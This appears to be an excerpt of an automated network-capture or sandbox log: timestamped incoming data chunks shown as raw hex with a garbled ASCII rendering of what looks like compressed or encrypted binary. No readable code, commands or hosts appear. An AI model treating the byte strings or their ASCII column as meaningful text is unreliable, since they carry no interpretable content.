                                                                                                                                                                                      2021-10-30 11:52:29 UTC856INData Raw: 4d 4b e2 07 03 ef 49 0c ab 58 4a 9d cb 28 70 e0 5b 60 e2 4f e2 d6 93 32 c8 cf c6 48 e0 a0 db 45 ac 92 75 84 6d e9 93 e4 fc 03 b3 14 bc 41 68 99 0a b2 fd b6 ad d0 0c 66 5b 85 f4 a9 6b d4 69 1c b1 ce a7 3a c5 34 d4 95 26 eb fc 47 04 56 0c 41 3d 4a 1c 38 dd ad fc cd 8e 74 29 e0 0f 1b b4 90 2d db 88 40 0c db 63 9f 6c 5f e6 25 75 24 94 8b 64 73 66 02 7c 1e 62 2e 34 96 3f fa c4 3c b0 ce b1 64 a3 26 f3 34 3e 46 b5 8c f6 d2 d2 7f ce 19 8a c8 85 ba 6c 7b 29 b6 a9 1d b2 19 f6 b1 6e 95 08 e7 4c 0b e4 c0 9a 10 79 72 f8 d3 e9 54 66 22 b9 e9 47 7f b2 66 c0 60 5b c6 b4 4f 0a 1e ac 8d 54 22 70 a8 f9 bc cc 09 5f 03 65 c6 48 f0 d0 d4 36 08 c2 25 e2 fd 32 41 06 7b 60 ad bf c6 f5 a9 1c c3 fa 9d c6 e0 c5 d1 32 15 d4 fa 1d 61 91 d6 da 02 29 a5 4f 3d ca f5 3f 63 3a d6 49 a4 27
                                                                                                                                                                                      Data Ascii: MKIXJ(p[`O2HEumAhf[ki:4&GVA=J8t)-@cl_%u$dsf|b.4?<d&4>Fl{)nLyrTf"Gf`[OT"p_eH6%2A{`2a)O=?c:I'
                                                                                                                                                                                      2021-10-30 11:52:29 UTC857INData Raw: af 06 ab a6 f5 43 45 ba da 7a eb 3f 9a 81 f9 02 5c 20 2c 9d e0 95 af 45 22 fc 71 87 41 52 03 7d 5a ea f8 d7 83 96 02 6a a9 b2 3e 09 6f c2 4a 11 55 3d d1 86 43 14 f2 21 96 ce 53 a1 63 b1 84 78 9c 36 ef 4d 89 3e 6c 87 da 62 30 96 c4 05 56 5b b3 81 ec 1c d1 f9 c7 a5 a7 e6 43 c3 ed 60 b9 40 ae 8e b4 2b bd fa 01 82 b5 d9 cf 3e f6 23 d1 47 79 59 5b b4 e9 45 c4 11 f6 b1 6e 95 72 2c 12 cb 37 cf a1 41 d1 29 79 bc ae 06 2b e3 a3 9c 48 d2 ce 2c a4 69 6a 30 16 e3 a0 48 5b eb 69 89 b3 46 9b 2b 14 ef 6b 10 38 68 5f 7c 8a c6 ed a8 78 22 78 f0 3a f5 1b cc a4 8c 3a 2b 80 f4 57 74 bf e2 a5 35 4a f2 ba f7 3e 30 20 08 2f 81 4a 7a c1 af 8c fa ab 23 41 f7 65 f6 57 b5 95 4d 41 64 1b 4a 58 cd 21 52 2b c8 91 6c b8 32 a2 73 bd 0e 05 22 cb 26 dd 6f 1e 40 78 43 c6 ba 2f 29 87 89 75
                                                                                                                                                                                      Data Ascii: CEz?\ ,E"qAR}Zj>oJU=C!Scx6M>lb0V[C`@+>#GyY[Enr,7A)y+H,ij0H[iF+k8h_|x"x::+Wt5J>0 /Jz#AeWMAdJX!R+l2s"&o@xC/)u
                                                                                                                                                                                      2021-10-30 11:52:29 UTC859INData Raw: b9 5a 66 35 e2 66 cd e7 1a 4b 8e 89 d2 c7 94 9f f3 aa fa a0 71 0e e0 7f f5 29 6c 5d bf d3 26 ad b2 e1 52 c3 2a 88 b6 ce 6f a9 8f 24 25 c4 d4 b8 23 96 6f 3a 80 43 b6 90 7e d6 93 32 73 42 ba bd 9c ad fd 33 15 9c 86 dc b5 8d 7e 4a 92 79 ac 53 c8 53 95 b4 26 e1 c0 f1 ac c0 21 f5 55 b7 30 2f 70 68 6d 07 0e f8 21 b7 78 55 d0 46 64 a9 7d 08 b7 c9 54 79 63 ba b2 85 cd 58 69 8d 55 c7 34 bc 81 81 71 83 4b 93 a5 0b b1 9e 6c 40 08 6f 94 74 bc e6 27 d8 14 ae 9a 4f db 88 e5 93 c8 fe 7c 9f e8 6b 10 c4 f2 31 c1 57 dd 75 38 2e f3 4c 5d de b8 66 31 fe 7c e9 5c ad b9 f1 a8 b9 a8 c5 81 f6 ba 21 82 c7 f4 8f 09 74 09 19 a8 27 a2 7c 9e c4 07 97 d8 aa 97 11 0f e5 33 52 a7 b1 a6 3e c2 f2 cd 0b 68 88 b1 e4 81 79 5b 0c 32 c6 1b a8 b5 05 54 3a 68 1d db 9b 89 34 5d d7 18 03 05 75 b6
                                                                                                                                                                                      Data Ascii: Zf5fKq)l]&R*o$%#o:C~2sB3~JySS&!U0/phm!xUFd}TycXiU4qKl@ot'O|k1Wu8.L]f1|\!t'|3R>hy[2T:h4]u
                                                                                                                                                                                      2021-10-30 11:52:29 UTC860INData Raw: 86 73 db 24 25 dc 3f b4 bf 9e 37 7f 20 cf db 9a 03 f6 e9 27 65 4d f3 65 e6 80 2f f9 1c 35 d6 79 73 85 04 1f 2c 07 ba f2 31 07 85 f2 50 10 69 cb 38 c3 7e 44 eb 3c 32 f6 31 da 9e 0e d0 50 1b c1 1c 29 92 9a 4d 27 c9 7e 1d 4f a1 e8 74 9c 98 02 cc 61 83 53 6e d0 10 69 b2 2e cb 70 8b 82 b9 00 43 6f ae 10 69 7b 81 43 cd e7 db 80 12 0e b9 0d 5a 22 b4 41 6b 12 84 4b c4 eb 22 98 de 4e 53 64 bd 52 9a d7 8a 24 df 7a d2 46 43 83 25 7d 95 8f 67 60 20 80 6b 86 a5 84 b6 fc a6 78 2e 26 fd 3e 46 0a 6f cc bc 8f 4a 29 48 3f 3b de 7d a2 ae 45 de 2d 64 fd 04 70 56 f1 aa 3d 84 f3 65 3d bd d1 f4 d4 1c 75 ac 94 82 6a b3 0a 7f be f9 db 68 a4 68 5e a0 1d 6e 2f 29 81 58 52 5f 68 2f 90 6c ae d0 23 6d 30 bc 24 3e 12 e1 43 6a 39 d8 16 a1 7d a8 27 e4 fc b3 1c 31 45 26 a3 c6 a7 1b b5 eb
                                                                                                                                                                                      Data Ascii: s$%?7 'eMe/5ys,1Pi8~D<21P)M'~OtaSni.pCoi{CZ"AkK"NSdR$zFC%}g` kx.&>FoJ)H?;}E-dpV=e=ujhh^n/)XR_h/l#m0$>Cj9}'1E&
                                                                                                                                                                                      2021-10-30 11:52:29 UTC861INData Raw: 05 d4 b4 16 ad 60 e3 fa 6b 0c 0e cc 56 f0 b2 b3 74 a1 ad 5e 53 dc f2 5b f9 fe 55 1c 37 67 f5 9c a0 87 57 3a bf da ed 9c 90 17 e2 55 0e 52 c5 41 e0 10 45 c7 40 90 36 1b b1 7c 48 ce af 91 71 d6 75 c9 04 3b bd 1b e9 9c 81 76 fc 9c 15 de d4 ad f9 65 1f ff ec 8f 36 1e c0 97 d8 08 f8 d2 5f 7d a2 a0 ad 7d ec 37 7c d8 1a db 88 2f 2d 9f 28 11 a9 23 da 9e f6 f4 18 30 4e 57 13 6d 71 49 97 dc 49 82 d3 60 4e 05 38 b5 5f da ac 87 92 6e 9f a2 0e 96 59 81 83 de 78 85 f7 a1 d1 2d 16 0e 72 93 66 0a 1c e4 1f 0b 20 4d 25 eb a8 44 dd 5f 85 d0 46 8e a6 d8 28 d8 d7 3f ed ad 74 8d f4 5b 77 93 3a b3 81 e9 42 58 dd 95 94 52 52 af 29 6e c5 6c 1f bc e2 5b 37 67 b6 1d 24 dc 31 ea 62 e5 92 c0 01 05 91 7e 44 da 96 8f 69 f3 49 3f a2 63 56 9c e1 b1 69 32 ee 81 71 42 b7 c4 38 d7 f2 16 19
                                                                                                                                                                                      Data Ascii: `kVt^S[U7gW:URAE@6|Hqu;ve6_}}7|/-(#0NWmqII`N8_nYx-rf M%D_F(?t[w:BXRR)nl[7g$1b~DiI?cVi2qB8
                                                                                                                                                                                      2021-10-30 11:52:29 UTC863INData Raw: 2b af f3 22 b7 d6 a6 af 73 67 7f fd 50 ca 18 1d 7a 39 7b a4 ee a9 39 c6 cb 8e fb ac ed 7e f5 db 9f b8 df dc 78 2d 79 a6 0f c7 1f f0 1d d2 ba 73 e1 b7 4e 76 c7 9d b1 2f 59 53 07 5e 2e 16 e6 07 3f fd d6 48 9b b4 af 1f fb 2b b3 dd be 24 6d 91 92 f8 7c 19 ee 20 95 6d 0b d2 64 4b 41 a2 4d 4a b4 41 90 ad e1 de f5 af 7f 3f e8 ce bb ec d4 e8 d3 39 88 e5 43 82 2f dc 81 74 0c 91 f5 ac 78 db 5d ca ae d3 83 99 76 23 9c ee 64 e6 33 5e 2f 11 4f fe dd 4b 3a e7 f9 92 7c 61 a3 66 09 64 e9 0d 1a 0a e2 4b 8a 23 ec 47 a4 ee a1 36 34 96 cf 02 9f a6 9d 7d ca 81 5e 3f fe f0 2f f8 72 60 b2 e0 b5 69 ba 3e 31 46 8a cc 0f fa 1c b7 f5 97 d7 f7 f6 f9 97 9f e1 1e 80 7f 99 7a 3f 1c ea b9 42 e0 60 6f c0 aa 0d 97 fe 97 9f f9 b1 1b 70 28 7d 2f da 4c e7 86 df fd c4 ed fb d5 4d dc 4a eb bc
                                                                                                                                                                                      Data Ascii: +"sgPz9{9~x-ysNv/YS^.?H+$m| mdKAMJA?9C/tx]v#d3^/OK:|afdK#G64}^?/r`i>1Fz?B`op(}/LMJ
                                                                                                                                                                                      2021-10-30 11:52:29 UTC864INData Raw: bc 09 f7 41 55 9f ed f7 c1 79 45 db 65 96 f1 44 97 cb 48 e8 f1 3d 6a 08 96 5e 47 9f e5 a7 92 75 24 b1 a9 47 19 67 2c 5f 13 27 1d bd 67 ed 69 1a 73 fd b5 57 b9 ef 5e 7e 2e 59 03 e3 46 5f 2b de 34 79 dd 0b 5e e8 fa e6 e8 e8 b3 0f 82 63 9e ed f7 db 20 e4 c2 21 d4 09 b7 e5 64 23 06 87 a6 0f ae 8d 02 87 50 3f d8 48 53 e9 75 38 c8 73 89 0b 76 96 72 fd af 7f e0 76 81 cd 1a 53 7a b6 69 1e cc d6 04 a7 69 97 7d d7 23 ad ce ef 6f f9 95 bb ee 57 3f 20 6b 7a b1 c8 93 9e ec f6 df e5 4c b2 ba b3 fd 97 d6 74 b7 dc f6 3b b2 52 c2 ab ab db b4 a7 75 aa 15 be f5 17 57 25 ad 3b 1b ae f6 79 f7 d6 d7 be 27 19 47 da 4f 6a b3 af 2b 55 fd 70 67 41 2a 5f 20 da a4 f0 06 48 0b a2 6d 24 67 4b 1f b2 95 78 6f 9a c5 a9 17 1d 43 1a 83 73 1d e6 db dc 98 4d 11 78 5f 1b 98 86 88 eb 12 d7 05
                                                                                                                                                                                      Data Ascii: AUyEeDH=j^Gu$Gg,_'gisW^~.YF_+4y^c !d#P?HSu8svrvSzii}#oW? kzLt;RuW%;y'GOj+UpgA*_ Hm$gKxoCsMx_
                                                                                                                                                                                      2021-10-30 11:52:29 UTC866INData Raw: 16 be 97 b1 04 dc 8c 5d 75 fa 8d b5 f6 10 5f 0a 1b 91 ba 06 52 6b 24 3e 30 a4 1d 74 3e c3 00 eb 58 7a 1d 0e ec fb 9f 77 87 2f 76 ef c2 37 8e ff ad 5b f2 99 2f f0 7a 6c 93 4a ff 63 80 da 97 fe d6 92 0c f6 05 d2 f3 90 1c 73 f2 ee ee c8 13 ca ff 82 f8 1d 6f fd 98 db 6b e7 f0 69 e5 53 85 bc ae 7f f9 eb 5d ee ca ef 9f eb 4e 38 6d 2f 77 e7 9f 6f 21 6f 39 97 9c 71 87 5b 7c b1 25 bc 9e 5b 3b 95 ee af 42 1a 04 94 d9 8b 8b 2f 3f dd 6d d3 f1 4d ee cf 7e c6 f3 dd 45 27 da 6f be 9f 2e 1c 75 ca 5e ee a0 63 76 24 ab 1b 4f 81 eb 72 e5 99 cd ef d7 6b 9a fb 70 ad 1e 71 1b 6c ff 41 f7 dd cc 5f 2d b6 b1 c2 b2 ab bb 7d b6 3b ae d6 4f b3 0d ff 20 21 0d 59 6e 9d 57 b8 1b 6f 29 ff ae cf 43 76 3e cd 2d ff 8e 15 c3 26 4d d1 36 0e c4 f6 d9 af 78 2b 17 f9 cd 4d bf 70 ef 5a f7 d5 64
                                                                                                                                                                                      Data Ascii: ]u_Rk$>0t>Xzw/v7[/zlJcsokiS]N8m/wo!o9q[|%[;B/?mM~E'o.u^cv$OrkpqlA_-};O !YnWo)Cv>-&M6x+MpZd
                                                                                                                                                                                      2021-10-30 11:52:29 UTC867INData Raw: 92 5b 43 d2 8f 9f 8e 8f 7f 21 5a 0a 3f 51 6b 06 56 84 d1 f9 38 d6 f4 57 8e 1c 7d cd dc 75 f7 6d ee bb 3f bc 88 ac c9 12 56 56 b7 73 e7 fc 8f 2e b7 96 5b 71 f9 4f 7b 5f 1f d6 dd 66 d9 e4 57 74 28 48 d0 c3 ab 16 f5 1d be bc 9e bb f1 96 5f f9 58 57 de b8 d4 3b dc e6 6b ed 4a 6d ea 3e 6c 5b 0a 62 f9 ba 90 ab 5b f7 57 af e2 18 ab 27 79 32 ee 1a db 1f b8 19 69 a3 71 f8 99 07 90 56 4e e3 fd 68 d4 9b 55 a7 fa a3 76 36 a0 89 eb ae 61 6a 93 b5 29 f2 b4 9f d7 71 78 8f da 04 c1 f6 a5 68 c6 f1 34 8d 99 d4 53 b5 12 f8 af 32 93 89 06 d8 d6 fe ae c4 fa d6 24 32 2a 26 4d 4b 0f b7 7a 69 53 09 4a 6e 83 16 64 8e 3b ea 8c 7d 41 1b 9d 1f 5f 77 85 fb f5 8d e1 73 9b b0 6d ab 44 a2 0e 4a d0 71 ec e9 f8 2d 9a 62 33 9a a2 05 91 82 5f 2c fd 9f 8e 7f ac 33 2e ce bc e0 70 77 df df ee
                                                                                                                                                                                      Data Ascii: [C!Z?QkV8W}um?VVs.[qO{_fWt(H_XW;kJm>l[b[W'y2iqVNhUv6aj)qxh4S2$2*&MKziSJnd;}A_wsmDJq-b3_,3.pw
                                                                                                                                                                                      2021-10-30 11:52:29 UTC868INData Raw: c9 d8 71 13 fc 42 f5 bf dc 7b d7 78 9f aa c5 93 49 27 33 ea 99 f8 c8 88 76 4d 8c 38 bb b0 ac f4 30 2a ef 83 03 6f bc 10 ef b3 84 36 4a d2 37 ca 7b 62 4a 38 f0 88 ad e1 58 f5 cb 70 ff 39 9a 62 b3 89 07 fe 71 bf db 69 cf 55 dc 8a 6b bd 08 36 b5 57 91 b7 9c d7 2f f5 4e d2 6c e4 0f 66 66 d4 f5 7c f8 49 7b 90 36 7e f0 8f 13 be 71 79 fd 5b 49 70 cc 2c a5 b4 d5 c9 c6 c1 11 37 36 e4 42 50 67 61 0e db e3 5c b7 c4 e2 dd 3e a4 98 b9 e4 bb 5f 73 db 7f 79 3d 77 d8 08 1f 89 73 c2 de 17 55 63 65 a1 18 96 2c 8c f6 69 9b c9 f9 cb 08 af 6e 7c c5 eb 39 2c a1 6b df bb 1f b1 3d 69 93 e1 ab a7 d5 9f aa 8d 72 7f 0a 75 c5 19 aa c6 46 6f 7b 60 2a 30 d7 27 5e 00 75 11 6a 79 94 33 e7 d2 9f fd d7 bc 5e 6d 0b 3f 17 2f f1 df f8 9b 6b dd fa ab f4 fb 6b a8 52 9e fc 94 25 dc a9 17 fc c1
                                                                                                                                                                                      Data Ascii: qB{xI'3vM80*o6J7{bJ8Xp9bqiUk6W/Nlff|I{6~qy[Ip,76BPga\>_sy=wsUce,in|9,k=iruFo{`*0'^ujy3^m?/kkR%
                                                                                                                                                                                      2021-10-30 11:52:29 UTC870INData Raw: cf a8 e0 a9 36 d1 16 ef 4a 32 97 60 f0 7c 6a 3f 3a 82 af 7e 0d 13 81 43 da 8e 91 0f 07 7c 0f 03 fe cb f0 ec 6f 74 ff de c2 8f 7e e0 d3 ee 51 8f 7a b4 db 69 eb 63 c8 53 ce 0d bf fb 89 bb fa 9a 8b c9 aa c6 34 d0 9d f7 be 63 65 f7 91 f7 ad 43 56 8e f1 ce ee 21 c7 ed ea fe 5f 8f 8f 8f d8 63 9b 63 fd 27 f9 f7 f9 34 ff bd be fa 59 ff ba 6b 7a ed 71 5c e7 78 1f 1c 46 dd 9c b1 cf d2 c3 2b 4c da ce 1d b9 c7 79 7e 33 35 29 4e f8 d2 05 6e b1 27 3d 39 f6 c7 c8 31 30 96 8f 49 fd fc 6a 0c c2 3f 31 f8 fc a6 23 e7 7c fb 74 f7 9b 9b 7f 49 56 39 07 6d 7f ac 7f af d9 4a ef 2d fb b5 ba 64 bf 13 76 77 f7 fd fd af 64 09 fc 34 e5 66 7a 60 7e a2 71 05 a8 97 53 e6 e3 39 8c 1f dc 2d 82 78 1d 7a 8f c2 3e 0c 02 27 cc ed fe 97 9e f8 2b cf 57 bd 7e 19 7f 56 2b ae fe 59 b7 d8 53 96 a0
                                                                                                                                                                                      Data Ascii: 6J2`|j?:~C|ot~QzicS4ceCV!_cc'4Ykzq\xF+Ly~35)Nn'=910Ij?1#|tIV9mJ-dvwd4fz`~qS9-xz>'+W~V+YS
                                                                                                                                                                                      2021-10-30 11:52:29 UTC871INData Raw: 98 53 3d 98 d0 e5 88 58 e3 f5 3e 38 70 8c af 09 52 8f 69 a1 eb 07 87 d4 2f 65 8e 3b e0 28 fb 2f 2f db 58 7f 4d b8 d6 d0 08 b7 cf bc f1 75 cb b9 e7 2e f9 bf 64 95 73 c4 f1 3b 91 36 d0 04 3e 45 db 74 dd 3d dd a1 7b 5f ea 96 a4 f7 7a 31 f2 06 90 dc 0c c6 f8 34 0d db 3d be c7 d3 b4 0f bf 77 4d f7 d4 c5 96 f0 f5 93 b1 01 5f ec f1 54 ed 3f 0f fd c7 9d f0 b5 03 7d 63 fc 94 a7 6a b7 ba 83 c9 bb 98 f6 49 3b e7 0b 12 f0 7d 60 5f d4 19 f7 8b 90 ab 26 88 b6 f7 db b6 fb 1f ed 48 d6 fd d8 67 dc ff bd e8 d5 64 55 a4 fd 54 e7 5d 89 ce 01 a4 23 3a 03 19 f7 b4 23 3e cd ea c0 52 2f 7e ad 7b cd ff be 81 ac 94 3d 37 eb f6 dd ba cc 61 67 74 7f 5d 8c 4a b8 aa 03 33 8d dc 6b 0a 36 6a 70 cb 81 a8 94 f6 a7 6c 7c ab 32 62 aa ad 6b ae ba d8 5d df e3 69 da ea 1b ee 1c db 64 d8 ee fb
                                                                                                                                                                                      Data Ascii: S=X>8pRi/e;(//XMu.ds;6>Et={_z14=wM_T?}cjI;}`_&HgdUT]#:#>R/~{=7agt]J3k6jpl|2bk]id
                                                                                                                                                                                      2021-10-30 11:52:29 UTC872INData Raw: 74 91 a7 ba d7 bd ea 5d 8d f2 da 57 bd d3 7f a9 fc 2b 5f fe 56 f7 8a ff 7d 93 7b cf 32 9f 70 6b 7e 72 3b b7 ed 67 e7 ba 0b cf b8 cb 6f 38 df f0 9a f7 52 8b dd b9 02 36 7b 77 dd 7d 1b 59 b4 e2 d4 b2 53 a6 27 f8 f2 57 c6 aa c3 60 ac 29 7e 5c 8f f7 a6 ad b3 f2 e7 cc 4d 1a f7 25 fb db 7d ab 7e df 31 7b b4 78 aa 26 db 2c b2 e1 10 85 7d 4a 90 52 9b d1 f6 4d b7 fe 76 ac 9b 34 e4 b8 f3 0e 73 a7 5e 44 ef ef e3 0e 75 c7 8a 82 94 19 43 9f a7 69 cb be e9 03 b0 49 5b 0a 34 31 03 99 97 cb e7 d7 db c3 3d fa 51 8f 26 ab 1c eb bd 6a 49 17 4d 37 ce 06 7a 56 2b 67 36 2c 8a 19 0a bf 26 c3 46 0d 34 94 e4 d7 9d e8 07 d1 3f fc 9b ec 87 a1 49 de b0 7d ff f2 73 dd 4d 37 5c 07 de 72 f0 49 c4 27 d6 fb 7c d2 7e 4e 90 05 1e fd 28 b7 0a e4 77 e5 fc b3 e6 ba 7b ef b9 33 b6 83 33 11 36
                                                                                                                                                                                      Data Ascii: t]W+_V}{2pk~r;go8R6{w}YS'W`)~\M%}~1{x&,}JRMv4s^DuCiI[41=Q&jIM7zV+g6,&F4?I}sM7\rI'|~N(w{336
                                                                                                                                                                                      2021-10-30 11:52:29 UTC874INData Raw: 0e 28 08 fb 10 2e 7f 7d e3 cf dc c5 97 9f 4a 56 39 9f 5d 5f dc 70 7a b0 e9 7a dd bf de e5 ce 3f df e2 ce b9 a0 df af c1 a6 1f 61 f6 b6 d8 e8 40 b7 d8 a2 4f f5 7a 17 8e 38 61 57 5a 65 f2 aa 56 c8 55 db b4 49 43 5b fb 90 9c 1f 39 e4 f8 5d dd 7f 1f fe 2f 59 e5 ac bd d2 56 a4 55 ed 73 1f 7a 03 85 b0 8e 2b 1a bf 3f 76 ed 8f 77 df e0 1c 7c e2 1e ee fe bf fd c5 37 94 6f 3f 20 6d cb 87 48 db f2 49 bc cf 1f e0 fa 80 3c fc c8 c3 6e f5 6d c3 97 7d 4f 15 5f 3e ee 0b ee 92 ef cf ee ef cd 3d fa 9c 43 dc 1f ef b8 89 ac 72 36 5b 95 3e 7b b0 f0 46 a6 d3 36 f9 64 f5 74 b8 94 33 2e 3d d1 5d ff bb 9f 15 f7 39 0a 53 d0 c5 c0 14 10 ff ea 13 ef 28 71 f3 c3 42 b1 52 79 e8 a1 87 dc d7 8e f8 22 68 dd 58 6e e5 0d dd 53 9e fe ec b0 29 8b fd d3 a6 4c 88 b9 81 a3 fc b7 2e bb a2 7b fe
                                                                                                                                                                                      Data Ascii: (.}JV9]_pzz?a@Oz8aWZeVUIC[9]/YVUsz+?vw|7o? mHI<nm}O_>=Cr6[>{F6dt3.=]9S(qBRy"hXnS)L.{
                                                                                                                                                                                      2021-10-30 11:52:29 UTC875INData Raw: e0 b0 1e 4f a5 fb 92 ae d0 81 99 46 ed 8f 09 e4 2d 46 fa 43 2c a0 fd b8 c9 f9 ee 85 27 b9 bb 7a 3c 4d 5b 61 dd 6d e3 26 cc 6f c4 c0 cf ed 4a 3d 11 ce c5 52 c5 7a 3d 55 c3 f7 d5 e1 53 35 a3 3d 9c 8a 68 7b 5d df ae 2b a4 2d 4b ac d3 15 6e 4b 0a 62 db a1 fd e8 87 43 d4 a9 0c 12 c6 ce e0 f7 02 7e f3 ca 33 c8 2a 67 9d 11 3e 03 4c 82 a3 46 d9 70 ed ee 1b fc 7b fe 72 bb 3b ed 6b dd 6f d0 53 0d 9f 63 0e 19 5b e5 e3 5b b8 a7 3f ed 39 64 95 73 a2 da 80 c4 92 0c e9 63 1d 69 b3 11 f6 b1 ff 88 1e df 40 f0 c4 85 17 71 6b ad b8 b9 df a4 c9 b6 58 4f ed 6a 95 da f1 20 9f a6 a7 73 5d 38 fc f4 fd dc 5d 77 ff 29 b6 87 70 7f a1 4f 7e 95 a4 7d 31 d1 07 07 de 70 32 31 e6 ad 94 bf dc 7f af 5b 6d db e5 c9 ea 0e 6e ce 5e f4 9c 97 92 e5 dc 39 07 7e 9b b4 ee 9c 74 c1 51 fe 93 fb 67
                                                                                                                                                                                      Data Ascii: OF-FC,'z<M[am&oJ=Rz=US5=h{]+-KnKbC~3*g>LFp{r;koSc[[?9dsci@qkXOj s]8]w)pO~}1p21[mn^9~tQg
                                                                                                                                                                                      2021-10-30 11:52:29 UTC876INData Raw: 1a e0 b6 24 dc 2e f7 67 11 73 48 2c f0 fb 26 37 da bd fb f7 93 32 67 ed ff 4d b7 e8 13 17 23 2b cf 59 fb 5d ea ff 22 b4 0f 97 fd e0 1b 6e ef 11 fe c0 61 5e 72 f8 99 07 b8 db f9 6b d4 3a b0 e1 ca 5b 92 d6 0c be 2a 6a 98 ce 94 4d 7a fc 05 e8 37 7f 70 81 fb ee 4f bf 45 d6 a4 c8 ad d4 81 a9 44 df 3b 58 da 68 fc 5d 53 dc 10 b1 90 9f 9b c6 a7 69 17 1c dd fd 7d 4e ef 5b fd b3 ee f1 4f 5a 94 7e 44 04 74 3f 6d e2 9f 9e 35 d4 79 f9 eb 97 71 2f ef f8 54 0d 39 45 3f 55 13 6d e3 1f 2f 64 7f ed 6a e9 ca ee 4a d2 0e 5d d2 d4 17 04 0f be 0c aa 59 22 ac f7 79 9a f6 fa 57 bf c7 bd f5 8d a5 ef b5 c1 9e b4 04 c2 59 d8 82 5f 13 d4 e7 a9 da 29 67 7d d9 fd f3 c1 07 40 ab f7 37 1d f0 9b 22 3e 49 81 34 b5 de ef a9 da 21 ee 4f 77 dc 14 db 92 25 af 9c 6a 83 c6 7e 9d 47 36 1c fc 66
                                                                                                                                                                                      Data Ascii: $.gsH,&72gM#+Y]"na^rk:[*jMz7pOED;Xh]Si}N[OZ~Dt?m5yq/T9E?Um/djJ]Y"yWY_)g}@7">I4!Ow%j~G6f
                                                                                                                                                                                      2021-10-30 11:52:29 UTC877INData Raw: 42 fc 0f 6b 29 22 ac 3f 06 a4 84 13 cf d8 c7 dd fb 97 6e ff 78 e8 8c 1c a4 16 4f 75 35 12 37 a1 7d ac fb 12 37 69 de aa fc 9f ea f5 54 6d ae bb e9 8f bf f1 6d 44 81 83 9e e3 36 f9 e3 ed bf 77 27 9e 7b 08 68 dd f8 34 fd 8a 29 b6 45 8a ec 1f 61 3d 67 23 96 0f a9 fc 61 be 97 5f fa 63 ee 8d af 7c bb d7 bb f0 d5 53 9b bf e7 56 f6 cf 92 e3 7d 1b be 99 b4 ee 1c bc fd b1 ee 7f 9f ff 7f 64 f5 e7 e4 bd ce ef f5 5d a8 c8 29 17 1d eb ce bc b4 fb 3f e4 a6 0a fc f5 ec 61 a7 77 ff 87 03 7e 1c c7 c2 8f 7b 02 59 4d 88 ab 5b 72 53 35 f0 d5 e0 80 4f 78 3f fe 9e d5 bc af 0b 87 9c de fd 7b 97 fb 8e 75 a0 3f 6d f7 02 86 f3 9a f2 75 8e 95 17 9f a8 e1 b5 d6 92 e3 d2 13 0f 70 ff ef ef dd be 58 78 91 c5 97 70 ef fc e4 86 7e 23 23 47 63 f5 57 e2 8b 36 b4 23 37 47 48 8c 91 7c e2 33
                                                                                                                                                                                      Data Ascii: Bk)"?nxOu57}7iTmmD6w'{h4)Ea=g#a_c|SV}d])?aw~{YM[rS5Ox?{u?mupXxp~##GcW6#7GH|3
                                                                                                                                                                                      2021-10-30 11:52:29 UTC879INData Raw: 6f b9 ff 81 fb dc be 7d 9e a6 b5 7e 1c 87 5a 55 4d 37 db 06 7c b5 4c dd 17 2e f9 12 b7 e6 87 36 20 ab 9c af 9e da 6f f3 5f c3 18 57 d3 27 05 0c 04 70 65 a8 d5 91 c0 71 9d 63 f9 a5 af 8f 1f a5 d3 46 ed a2 a3 f7 76 ff f9 f7 83 64 95 f1 b4 e7 bc d0 bd e5 43 d6 fb 2f e4 8f 06 39 a4 0a 5c 4f 7d 37 6d 88 f4 a1 7c 62 8b bd dc 02 0b 2e 08 5a 39 f8 54 ed 87 df 3e 37 b4 41 63 89 3a 94 7e 43 a6 74 de 9c c5 5c 92 be 14 d5 87 be 44 11 f9 f1 75 57 b8 ef fd b0 fb 07 62 ae f5 89 ed e2 15 b1 a4 0f 56 3b 4d 82 2c bf ec 9a ee 05 cf 7b 05 59 e5 1c 72 cc f6 be b4 da 65 e9 83 d5 0e 8a 46 c7 a2 0e 87 a0 d7 57 7d b4 e1 20 37 69 98 fb ee b7 ae e0 5e fb 8a b7 81 d5 8d 03 8f db 2d b6 51 17 d9 47 25 5f 3d 69 4f 38 76 e3 55 2f 7d 83 5b e1 9d 2b 41 fd d0 36 23 db 95 e4 fd e9 18 6b 40
                                                                                                                                                                                      Data Ascii: o}~ZUM7|L.6 o_W'peqcFvdC/9\O}7m|b.Z9T>7Ac:~Ct\DuWbV;M,{YreFW} 7i^-QG%_=iO8vU/}[+A6#k@
                                                                                                                                                                                      2021-10-30 11:52:29 UTC880INData Raw: 1e cc 9c 2c e3 66 8d 05 6d b8 2a a1 ac a4 2b d8 56 44 d6 37 da 42 97 74 ff f0 a7 97 f5 7a 9a b6 fe ea 3b d7 16 54 31 58 af a3 c4 8e 5a e4 dd 4b 7f dc bd f4 45 dd ff 65 bf d7 41 1b 36 f7 37 06 6a ed 53 41 2a e9 f5 27 69 9c 9f f8 64 1e 1c b0 c4 17 29 fb de fa 9a 77 bb b7 80 74 65 97 83 db 9f 2e 7e ae c7 27 d3 e3 87 cc be e7 4d ef 27 2b a0 db b5 30 73 12 c3 a6 56 a7 81 2d d6 e8 fe 2b f3 3f ff e5 4e ff c4 2c c7 9b 57 ff 5f d2 ba b3 ef 56 87 b9 57 f7 f8 aa ab 71 31 77 a7 93 dc a2 4f 5c 8c ac 6e 1c f5 b5 af ba 0b bf 73 0e 59 53 c3 e7 0f fc 2c 69 e5 3c eb 69 4b ba 75 3e b2 31 59 75 92 7b 2a 52 73 b4 e3 ab f4 a8 b7 d9 aa dd ff 91 85 7c e1 f0 ee 4f e3 24 25 43 ed 71 3a 33 9a b6 fb 87 8e eb 7b 8e 65 33 3e 46 09 7c 0f 47 41 58 b7 04 b1 fc 28 ad 1b b5 5b 7e 7d 6d af
                                                                                                                                                                                      Data Ascii: ,fm*+VD7Btz;T1XZKEeA67jSA*'id)wte.~'M'+0sV-+?N,W_VWq1wO\nsYS,i<iKu>1Yu{*Rs|O$%Cq:3{e3>F|GAX([~}m
